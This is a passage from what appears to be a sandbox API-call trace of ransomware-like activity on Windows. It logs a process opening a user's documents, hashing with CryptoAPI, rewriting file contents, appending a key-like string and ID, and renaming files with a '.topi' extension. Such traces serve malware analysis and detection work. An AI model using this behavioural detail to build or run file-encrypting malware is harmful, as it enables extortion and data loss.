HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\") returned="P63p r8YwN7PV\\" [0097.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0097.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.029] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.029] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.029] PathFindFileNameW (pszPath="") returned="" [0097.030] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\20ijM7cHxO2JwvZbK8.csv") returned=".csv" [0097.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\20ijM7cHxO2JwvZbK8.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\20ijm7chxo2jwvzbk8.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.031] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=77106) returned 1 [0097.031] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.034] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12d0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.034] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.036] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.037] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.037] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.037] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.038] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.038] GetLastError () returned 0x0 [0097.038] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.038] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.038] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.038] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.038] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12d30) returned 0x9a06a00 [0097.038] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03050 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03098 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.039] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c70 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c58 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.040] GetCurrentThreadId () returned 0x8c4 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8df0 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.040] GetCurrentThreadId () returned 0x8c4 [0097.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c88 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0097.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03098 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.044] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x12d2d, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x12d2d, lpOverlapped=0x0) returned 1 [0097.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.045] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12d32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.045] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.045] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.045] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.045] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.045] CloseHandle (hObject=0x6a8) returned 1 [0097.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.048] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\20ijM7cHxO2JwvZbK8.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\20ijm7chxo2jwvzbk8.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\20ijM7cHxO2JwvZbK8.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\20ijm7chxo2jwvzbk8.csv.topi")) returned 1 [0097.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.049] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.050] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa772efd0, ftCreationTime.dwHighDateTime=0x1d5c1fa, ftLastAccessTime.dwLowDateTime=0x49b9a4d0, ftLastAccessTime.dwHighDateTime=0x1d5b8a7, ftLastWriteTime.dwLowDateTime=0x49b9a4d0, ftLastWriteTime.dwHighDateTime=0x1d5b8a7, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LhiyZ.ots", cAlternateFileName="")) returned 1 [0097.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.050] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\LhiyZ.ots") returned=".ots" [0097.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\LhiyZ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\lhiyz.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.051] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1696) returned 1 [0097.051] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.054] SetFilePointerEx (in: hFile=0x6a8, 